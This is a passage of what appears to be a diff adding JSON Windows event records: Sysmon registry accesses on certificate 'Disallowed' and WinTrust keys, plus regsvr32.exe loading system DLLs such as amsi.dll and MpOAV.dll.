"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "amsi.dll", + "image_path": "C:\\Windows\\System32\\amsi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240270000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", + "registry_value": "SyncRootManager", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.StateRepositoryPS.dll", + "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "MpOAV.dll", + "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573240430000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "image_load", + "image_name": "cldapi.dll", + "image_path": "C:\\Windows\\System32\\cldapi.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 2012, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573241050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + 